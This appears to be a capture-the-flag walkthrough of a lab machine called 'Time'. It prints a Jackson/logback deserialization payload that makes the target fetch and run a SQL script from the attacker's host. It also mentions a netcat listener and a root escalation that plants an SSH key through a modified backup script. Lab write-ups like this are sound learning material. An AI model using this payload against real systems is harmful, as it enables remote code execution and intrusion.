In this post, i would like to share a walkthrough of the TIME Machine.
This room has been considered difficulty rated as a MEDIUM machine
Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN
Information Gathering on the Time machine
Let’s open the browser and straight into the website interface.
We will be directed to the Online JSON interface and let’s do a test on the website by typing anything with the status of Validate(beta!)
Let’s do some research on the errors that appears above
After some research on the internet, I found a script that can be used for exploitation on the website.
The code that we can use for the exploitation looks like below:
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://<attacker's ip>:8080/<filename>.sql'"}]"
Exploiting the application with JSON code
Before we can click the Process, we can create a new file <filename>.sql
The code that will be used can be seen as shown below:
Let’s start our nc listener on other terminal
As usual, you will need to access/home/pericles and you will find user.txt stored inside there.
Next, let’s go and retrieve the root flag!
Escalate to Root Privileges Access on Time Machine
We need to create an ssh public and private key to access the machine via ssh service
You will need to copy your id_rsa code and paste it on the target’s machine with an extra command been use here.
The screenshot above shows the actual code that will paste on your target’s machine
The screenshot above shows the target’s machine
In the screenshot above, the file timer_backup.sh is one that we just modify to access the SSH service.
We should be getting the root access after a while
We can read the root flag by typing the “cat root.txt” command
-THE END-
Happy Learning Guys!
No responses yet